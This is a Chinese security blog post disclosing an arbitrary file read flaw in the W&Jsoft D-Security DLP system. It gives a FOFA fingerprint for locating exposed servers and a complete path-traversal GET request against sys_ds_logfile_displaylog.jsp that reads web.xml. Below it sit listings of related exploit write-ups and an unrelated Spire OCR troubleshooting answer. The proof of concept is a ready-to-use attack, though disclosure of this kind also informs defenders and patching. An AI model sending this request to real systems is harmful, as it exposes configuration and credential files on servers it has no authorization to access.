W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取漏洞

原创 已于 2025-01-13 22:23:20 修改 · 301 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

于 2025-01-13 22:22:55 首次发布

一、漏洞简介

W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取漏洞

二、漏洞影响

三、网络测绘:

fofa:
icon_hash="616947260"

四、复现过程

首页

在这里插入图片描述

步骤 POC 1

数据包

GET /DLP/public/admintool/system_setting/sys_ds_logfile_displaylog.jsp?logType=tomcat&logFileName=../../../../../../D-Security/webapps/DLPWebApps/WEB-INF/web.xml HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Priority: u=0, i
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Upgrade-Insecure-Requests: 1
W&Jsoft-D-Security数据泄露系统(DLP) sys_ds_logfile_displaylog.jsp 任意文件读取漏洞复现(附脚本)
iSee857的博客
01-06 265
W&Jsoft-D-Security数据泄露系统(DLP) sys_ds_logfile_displaylog.jsp接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
某赛通电子文档安全管理系统 ClientAjax 任意文件下载
weixin_43567873的博客
03-04 157
某赛通电子文档安全管理系统 ClientAjax 任意文件下载
(漏洞复现:CNVD-2023-09184)亿赛通电子文档安全管理系统任意文件读取漏洞
zkaqlaoniao的博客
12-28 3996
亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全
im即时通讯系统preview.php前台任意⽂件上传
swordheart的博客
05-20 343
im即时通讯系统preview.php接口存在任意文件上传
数据泄露防护(DLP)系统NetSecConfigAjax接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
07-23 934
数据泄露防护(DLP)系统是一款综合性的数据安全产品,旨在通过多种先进技术手段保护企业的敏感数据,防止数据泄露。某数据泄露防护(DLP)系统存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感数据
W&Jsoft-D-Security数据仿泄露系统(DLP)sys_ds_logfile_displaylog存在任意文件读取漏洞
缘梦未来的博客
01-04 301
W&Jsoft-D-Security数据仿泄露系统(DLP)是一个集内容管理与发布于一体的智能平台,广泛服务于新闻媒体及内容创作行业。平台支持多端协同和多渠道分发,拥有素材管理、内容编辑、智能审核等核心功能,并通过技术辅助创作与数据分析,显著提升内容生产效率与传播质量。从内容采集到发布实现全流程覆盖,优化工作流程,提高传播的精准度和时效性,帮助用户在数字化内容生态中实现高效协作与影响力扩展。
W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取
swordheart的博客
05-28 259
W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取
D-Security终端文件保护系统logFileName存在任意文件读取漏洞
缘梦未来的博客
01-08 226
D-Security 端点文件保护系统是由以柔资讯(W&Jsoft)开发的文件加密产品,旨在从文件生成时即对其进行自动加密,提供全生命周期的安全防护。 该系统被政府和国安局等情治单位认可为安全的文件加密产品,符合营业秘密法规范,能够完整记录用户对文件的访问和交换轨迹,提供文件访问溯源记录,帮助企业建立信息安全治理循环。 此外,D-Security 支持与企业内部的 PLM、ERP、KM 等信息系统无缝整合,方便各部门根据业务需求灵活设置机密文件的访问权限,提升企业核心竞争力。
2022-7-16 第七组 ---数组实现员工管理系统
qq_49036727的博客
07-18 336
Java实现员工管理系统
serv-u注册码
03-13
在IT领域,特别是网络管理与文件传输服务中,Serv-U是一款颇受欢迎的FTP服务器软件,由JSOFT公司开发。其强大的功能、稳定的性能以及友好的用户界面使其成为企业级应用的理想选择。然而,Serv-U的某些版本是需要授权...
数据防泄密(DLP系统
热门推荐
bruce135lee的专栏
11-23 2万+
数据防泄密(DLP系统 领先的文档安全管理专家! 对于核心数据,需要控制数据过程使用安全时,采用透明加密控制方式控制数据安全使用。 系统采用基于Windows文件系统驱动开发,结合高强度国际流行加密算法,对文件进行驱动层加解密操作。 对于需要保护的文件类型,系统会在文件保存时对其进行强制性的加密,并且不改变文件的格式和形态。 如果没有合法的使用身份、访问权限和正确的安全通道,所
什么是网络安全?网络安全包括哪几个方面?学完能做一名黑客吗?
weixin_57514792的博客
12-03 895
什么是网络安全?网络安全包括哪几个方面?学完能做一名黑客吗?
网络安全(黑客技术)—2025自学手册
2401_84760527的博客
11-24 1596
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
企业级Web安全加速方案:一体化防护DDoS/CC/爬虫攻击
2201_76066823的博客
12-02 275
针对DDoS、CC攻击及恶意爬虫的一体化防护方案需整合多层防御策略,结合流量清洗、行为分析、智能验证等技术,确保业务高可用性与数据安全
网络安全系列:系统后门与持久化技术深度解析
PyHaVolask的博客
12-03 730
本文系统阐述渗透测试中维持访问权限的核心技术,详细解析服务绑定、注册表自启动等持久化机制,涵盖Certutil/Bitsadmin远程下载、Meterpreter进程迁移与痕迹清理等高级操作,并提供完整的防御检测与应急响应方案,强调技术沉淀与合法授权的重要性。
网络安全中级阶段学习笔记(二):网络安全暴力破解学习重点笔记
最新发布
2501_91976946的博客
12-03 502
本文系统梳理了网络安全中暴力破解攻击的学习要点,主要内容包括:1)暴力破解的基础概念、产生原因及工作原理;2)攻击分类与准备工作,重点介绍常用字典类型;3)BurpSuite工具详解,涵盖Intruder模块的4种攻击模式及关键配置;4)Pikachu靶场实战案例,演示前端/后端验证码绕过及Token防护;5)防御措施和BurpSuite其他功能模块。笔记采用流程图、表格等形式归纳核心知识点,强调"知攻知防"的学习理念,为暴力破解技术的学习与应用提供系统指导。
远程桌面提权漏洞复现:原理详解+环境搭建+渗透实战(CVE-2019-0708)
mooyuan的网络安全博客
11-25 1224
本文分析了CVE-2019-0708(BlueKeep)远程桌面提权漏洞,该漏洞影响Windows旧版本系统,攻击者可通过RDP协议远程执行任意代码。文章详细介绍了漏洞原理、影响范围及防范措施,重点演示了利用Metasploit框架进行渗透测试的全过程,包括环境搭建、漏洞探测、模块配置、攻击实施及后渗透操作(创建管理员账号、远程连接等)。通过实验验证了该漏洞的严重性,强调及时打补丁和采取防护措施的重要性。
AI驱动的网联自动驾驶汽车网络安全测试方法
NewCarRen的博客
12-03 685
本文综述了网联自动驾驶汽车(CAV)网络安全测试面临的挑战与解决方案。随着CAV普及,网络攻击风险加剧,现有渗透测试方法面临测试环境成本高、专业人才匮乏等挑战。研究表明,人工智能(AI)在传统行业渗透测试中展现出缩短时间、提高效率的优势,但在CAV领域应用仍存在明显缺口。文章重点分析了强化学习等AI算法在渗透测试中的应用潜力,指出创建仿真环境是测试AI模型有效性的可行方案。开源工具VEINS被推荐为合适的仿真平台,其Python/C++接口便于AI模型集成。研究认为,若证实AI方法有效,可扩展应用于完整CA
2025年第二届全国网络安全行业赛-电子取证师初赛(第一批27号)
Aluxian_的博客
12-03 658
2025年全国网络安全行业赛电子取证师初赛题目摘要:比赛包含手机、U盘和流量包三类检材分析。手机检材涉及记账APP包名、转账记录、会议号等信息提取;U盘检材需破解压缩包密码并分析加密容器;流量包检材要求分析攻击IP、端口、密码等入侵痕迹。题目涵盖电子取证常见场景,考察参赛者的综合分析能力,包括数据恢复、密码破解、日志分析等专业技能。完整赛题及解析可关注鱼影安全获取。
java.lang.RuntimeException: com.spire.ocr.OcrException: Error occurred during ocr.initConfig. at com.jsoft.iims.module.reimbursementbill.service.impl.IimsReimbursementInvoiceinfoServiceImpl.analysisImageToResultMap(IimsReimbursementInvoiceinfoServiceImpl.java:136) ~[classes/:1.0.1-SNAPSHOT] at com.jsoft.iims.module.reimbursementbill.service.impl.IimsReimbursementInvoiceinfoServiceImpl.applyFile(IimsReimbursementInvoiceinfoServiceImpl.java:100) ~[classes/:1.0.1-SNAPSHOT] at com.jsoft.iims.module.reimbursementbill.service.impl.IimsReimbursementInvoiceinfoServiceImpl.addInvoiceToReimbursement(IimsReimbursementInvoiceinfoServiceImpl.java:253) ~[classes/:1.0.1-SNAPSHOT] at com.jsoft.iims.module.reimbursementbill.service.impl.IimsReimbursementInvoiceinfoServiceImpl$$FastClassBySpringCGLIB$$fa2b83c7.invoke(<generated>) ~[classes/:1.0.1-SNAPSHOT] at org.springframework.cglib.proxy.MethodProxy.invoke(MethodProxy.java:218) ~[spring-core-5.2.9.RELEASE.jar:5.2.9.RELEASE] at org.springframework.aop.framework.CglibAopProxy$CglibMethodInvocation.invokeJoinpoint(CglibAopProxy.java:771) ~[spring-aop-5.2.9.RELEASE.jar:5.2.9.RELEASE] at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:163) ~[spring-aop-5.2.9.RELEASE.jar:5.2.9.RELEASE] at org.springframework.aop.framework.CglibAopProxy$CglibMethodInvocation.proceed(CglibAopProxy.java:749) ~[spring-aop-5.2.9.RELEASE.jar:5.2.9.RELEASE] at org.springframework.aop.aspectj.MethodInvocationProceedingJoinPoint.proceed(MethodInvocationProceedingJoinPoint.java:88) ~[spring-aop-5.2.9.RELEASE.jar:5.2.9.RELEASE] at com.jsoft.framework.audit.aspect.AuditLogAspect.auditService(AuditLogAspect.java:85) ~[jsoft-core-common-1.0.1-SNAPSHOT.jar:1.0.1-SNAPSHOT] at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[?:1.8.0_311]
07-18
### 问题分析 在使用 Spire OCR 进行 Java 开发时,出现的异常 `java.lang.RuntimeException: com.spire.ocr.OcrException: Error occurred during ocr.initConfig` 通常与本地库(Native Library)加载失败有关。该错误的核心原因在于系统无法找到或加载所需的动态链接库文件(如 `libdnnl.so.1`)[^1]。 #### 具体表现 - **异常堆栈信息**显示: ``` java.lang.UnsatisfiedLinkError: Can't load library: /home/java/agrisubs/apps/dependencies/libdnnl.so.1 ``` 表明 JVM 在指定路径 `/home/java/agrisubs/apps/dependencies/` 下找不到 `libdnnl.so.1` 文件。 - **根本原因**:Spire OCR 的某些功能依赖于本地库,而这些库需要正确配置并存在于运行环境中。 --- ### 解决方案 #### 1. 检查动态库路径和权限 确保以下条件满足: - 动态库文件 `libdnnl.so.1` 确实存在于指定目录中。 - 目录权限允许运行 Java 应用程序的用户读取该文件。 - 使用命令 `ls -l /home/java/agrisubs/apps/dependencies/libdnnl.so.1` 验证文件是否存在。 #### 2. 设置 `LD_LIBRARY_PATH` 如果动态库不在默认搜索路径中,需将包含 `libdnnl.so.1` 的目录添加到 `LD_LIBRARY_PATH` 环境变量中: ```bash export LD_LIBRARY_PATH=/home/java/agrisubs/apps/dependencies:$LD_LIBRARY_PATH ``` #### 3. 使用 `-Djava.library.path` 参数启动 JVM 在启动 Java 应用时,通过 JVM 参数指定本地库路径: ```bash java -Djava.library.path=/home/java/agrisubs/apps/dependencies -jar your_application.jar ``` #### 4. 替换或重新下载依赖库 如果 `libdnnl.so.1` 文件损坏或版本不兼容,可尝试: - 从 Spire 官方获取最新版本的 OCR SDK。 - 确保所有依赖库(如 `libopencv_java450.so`, `libtesseract.so`)也正确安装。 #### 5. 验证操作系统兼容性 确认使用的操作系统架构(如 x86/x64)与 Spire OCR 提供的本地库匹配。例如,若使用的是 64 位 Linux,则必须使用对应的 64 位 `.so` 文件。 #### 6. 日志调试建议 启用 Spire OCR 的日志输出以获取更多信息,可以在初始化时设置日志级别: ```java Ocr.setLogLevel(LogLevel.DEBUG); ``` --- ### 示例代码:初始化 OCR 并处理图像 ```java import com.spire.ocr.*; public class OcrExample { public static void main(String[] args) { try { // 初始化 OCR 引擎 Ocr ocr = new Ocr(); // 设置模型路径(如果需要) ocr.setModelPath("/path/to/models"); // 加载图像文件 String imagePath = "sample_image.png"; String result = ocr.extractText(imagePath); // 输出识别结果 System.out.println("OCR Result: " + result); } catch (Exception e) { e.printStackTrace(); } } } ``` --- ### 常见错误排查对照表 | 错误信息 | 可能原因 | 解决方法 | |----------|----------|----------| | `UnsatisfiedLinkError` | 本地库未找到或路径配置错误 | 设置 `LD_LIBRARY_PATH` 或使用 `-Djava.library.path` | | `Load failed, please check it exists` | 动态库缺失或权限不足 | 检查文件是否存在、修复权限 | | `Can't load library` | 文件格式不兼容或损坏 | 替换为官方提供的库文件 | --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值